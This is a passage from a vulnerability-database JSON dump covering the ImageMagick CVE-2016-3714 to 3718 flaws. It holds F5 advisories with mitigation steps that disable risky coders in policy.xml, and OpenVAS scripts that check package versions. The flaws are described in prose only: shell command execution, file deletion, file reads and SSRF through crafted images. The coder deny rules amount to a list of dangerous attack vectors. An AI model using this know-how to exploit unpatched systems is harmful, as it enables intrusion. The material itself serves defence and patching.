SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-09-02T00:00:00", "published": "2016-05-13T00:00:00", "id": "SOL29154575", "href": "http://support.f5.com/kb/en-us/solutions/public/k/29/sol29154575.html", "type": "f5", "title": "SOL29154575 - ImageMagick vulnerability CVE-2016-3717", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:24", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol10550253\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, since the vulnerable coders listed in CVE-2016-3715 is EPHEMERAL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-09-02T00:00:00", "published": "2016-05-13T00:00:00", "id": "SOL10550253", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10550253.html", "type": "f5", "title": "SOL10550253 - ImageMagick vulnerability CVE-2016-3715", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-08-16T21:24:15", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol03151140\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTPS** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n\nSince the vulnerable coders listed in CVE-2016-3714 are EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, and PLT, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"TEXT\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"SHOW\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"WIN\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"PLT\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-08-16T00:00:00", "published": "2016-05-09T00:00:00", "id": "SOL03151140", "href": "http://support.f5.com/kb/en-us/solutions/public/k/03/sol03151140.html", "title": "SOL03151140 - ImageMagick vulnerability CVE-2016-3714", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol61974123\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTP** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n \nSince the vulnerable coders listed in CVE-2016-3718 are HTTP and FTP, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"FTP\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-09-02T00:00:00", "published": "2016-05-13T00:00:00", "id": "SOL61974123", "href": "http://support.f5.com/kb/en-us/solutions/public/k/61/sol61974123.html", "type": "f5", "title": "SOL61974123 - ImageMagick vulnerability CVE-2016-3718", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Check the version of ImageMagick", "modified": "2019-03-08T00:00:00", "published": "2016-05-10T00:00:00", "id": "OPENVAS:1361412562310882483", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882483", "type": "openvas", "title": "CentOS Update for ImageMagick CESA-2016:0726 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ImageMagick CESA-2016:0726 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882483\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:32 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ImageMagick CESA-2016:0726 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of ImageMagick\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple image\nformats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. (CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021865.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310851307", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851307", "type": "openvas", "title": "SUSE: Security Advisory for ImageMagick (SUSE-SU-2016:1260-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851307\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:24 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for ImageMagick (SUSE-SU-2016:1260-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n\n - Use external svg loader (rsvg)\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1260-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3\", rpm:\"libMagick++-6_Q16-3~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo\", rpm:\"libMagick++-6_Q16-3-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-32bit\", rpm:\"libMagickCore-6_Q16-1-32bit~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-1-debuginfo-32bit~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Check the version of ImageMagick", "modified": "2019-03-08T00:00:00", "published": "2016-05-10T00:00:00", "id": "OPENVAS:1361412562310882484", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882484", "type": "openvas", "title": "CentOS Update for ImageMagick CESA-2016:0726 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ImageMagick CESA-2016:0726 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882484\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:37 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ImageMagick CESA-2016:0726 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ImageMagick\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple\nimage formats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. (CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021866.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310851304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851304", "type": "openvas", "title": "openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1261-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 